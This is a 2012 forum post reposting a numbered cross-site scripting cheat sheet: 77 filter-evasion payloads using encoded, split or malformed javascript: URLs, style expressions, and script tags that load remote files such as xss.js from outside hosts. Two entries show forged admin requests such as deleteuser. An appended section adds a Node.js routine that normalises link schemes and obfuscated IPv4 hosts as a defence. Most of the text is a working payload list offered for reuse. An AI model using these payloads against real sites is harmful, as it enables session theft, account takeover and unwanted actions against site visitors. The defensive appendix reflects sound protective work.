XSS cross-site scripting attack roundup

Original poster, posted on 2012-9-5 14:56:34
There doesn't seem to be much XSS material on t00ls, so I'm copying over something good I came across; not sure whether anyone needs to bookmark it.
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons are required)
<IMG SRC=javascript:alert("XSS")>

(6) Fixing a defective IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front of the JavaScript
<IMG SRC="   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) ActionScript inside Flash can be used to smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; arbitrary commands can be executed
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
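Most of the entries above beat a naive filter in one of two ways: the scheme of a javascript: URL is disguised with mixed case, embedded tab/newline/CR/NUL characters, leading whitespace, or numeric character references with or without semicolons (items 3 to 14, 17 and 19), or the host of an otherwise ordinary link is written as a decimal, hex, octal or mixed IPv4 number (items 70 to 73). The defence in both cases is the same: normalise the attribute value the way the HTML and URL parsers will before checking it. The following is an added example written for this page; it is not code from the original post or from the cheat sheet it copies. It assumes Node.js, an allowlist of http, https and mailto (an assumption; adjust to the application), and the function names checkHref, decodeCharRefs, stripControls and canonicalIPv4, all chosen here. It goes slightly beyond the list by also decoding decimal references and accepting IPv4 hosts written with one to four parts, as browsers do.

```javascript
// Added defensive example (not from the original post): normalise a link or
// image attribute value the way an HTML and URL parser would before deciding
// whether its scheme is acceptable, and canonicalise the obfuscated IPv4 host
// forms from the list so allow/deny lists compare the real address.
// Plain Node.js, no dependencies. All sample inputs below are constructed.

const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']); // assumed allowlist

// Decode numeric character references with or without the trailing ';' (the
// HTML parser accepts both), so "&#x6A&#x61..." and "&#106;&#97;..." decode.
function decodeCharRefs(value) {
  return value.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, num) => {
    const cp = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : '';
  });
}

// Drop every code point at or below U+0020 (NUL, tab, CR, LF, space) and DEL.
// This is stricter than browsers, which keep an embedded space, so the result
// is used only for the scheme decision and is never echoed back to the page.
function stripControls(value) {
  return Array.from(value)
    .filter((ch) => ch.codePointAt(0) > 0x20 && ch.codePointAt(0) !== 0x7f)
    .join('');
}

// Scheme as the URL standard defines it: an ASCII letter, then letters,
// digits, '+', '-' or '.', up to the first ':'. No match means a relative URL.
function extractScheme(value) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(value);
  return m ? m[1].toLowerCase() : null;
}

// Parse an IPv4 host in every form browsers accept: dotted decimal, a single
// 32-bit number, hex (0x..) or octal (leading 0) parts, mixed, and 1 to 4
// parts where the last part fills the remaining bytes. Returns the
// dotted-decimal form, or null if the host is not numeric.
function canonicalIPv4(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop(); // trailing dot
  if (parts.length < 1 || parts.length > 4) return null;
  const nums = [];
  for (const p of parts) {
    if (/^0x[0-9a-f]*$/i.test(p)) nums.push(p.length === 2 ? 0 : parseInt(p.slice(2), 16));
    else if (/^0[0-7]+$/.test(p)) nums.push(parseInt(p, 8));
    else if (/^[0-9]+$/.test(p)) nums.push(parseInt(p, 10));
    else return null;
  }
  const last = nums.pop();
  if (nums.some((n) => n > 255) || last >= 256 ** (4 - nums.length)) return null;
  const addr = nums.reduce((acc, n, i) => acc + n * 256 ** (3 - i), last);
  return [24, 16, 8, 0].map((s) => Math.floor(addr / 2 ** s) % 256).join('.');
}

// Decide whether an attribute value may be emitted as a link target.
// Returns { safe, scheme, host }; host is the canonical IPv4 form when the
// authority is numeric, otherwise the lower-cased host text, or null.
function checkHref(value) {
  const normalized = stripControls(decodeCharRefs(String(value)));
  const scheme = extractScheme(normalized);
  if (scheme !== null && !SAFE_SCHEMES.has(scheme)) {
    return { safe: false, scheme, host: null };
  }
  let host = null;
  if (scheme === 'http' || scheme === 'https' || normalized.startsWith('//')) {
    const authority = normalized
      .replace(/^[a-z]+:/i, '')
      .replace(/^\/\//, '')
      .split(/[\/?#]/)[0];
    const hostText = authority.slice(authority.lastIndexOf('@') + 1); // drop userinfo
    const bare = hostText.replace(/:\d*$/, '').toLowerCase();          // drop port
    host = canonicalIPv4(bare) || bare;
  }
  return { safe: true, scheme, host };
}

// Constructed samples mirroring the tricks in the list above.
const SAMPLES = [
  'http://example.com/page',
  'JaVaScRiPt:alert(1)',
  '&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert(1)',
  'jav\tascript:alert(1)',
  'http://3232235521/',
  'http://0xc0.0xa8.0x00.0x01/',
  'http://66.000146.0x7.147/',
];
for (const s of SAMPLES) console.log(JSON.stringify(s), '->', checkHref(s));
```

The order matters: character references are decoded first because that is what the HTML attribute parser does, and only then are control characters stripped, so "jav&#x09;ascript:" and "jav<TAB>ascript:" both collapse to "javascript:" before the scheme is compared. For the host, the canonical dotted-decimal form is what should be compared against any allow or deny list; comparing the raw text lets "http://3232235521/" slip past a rule written for "192.168.0.1".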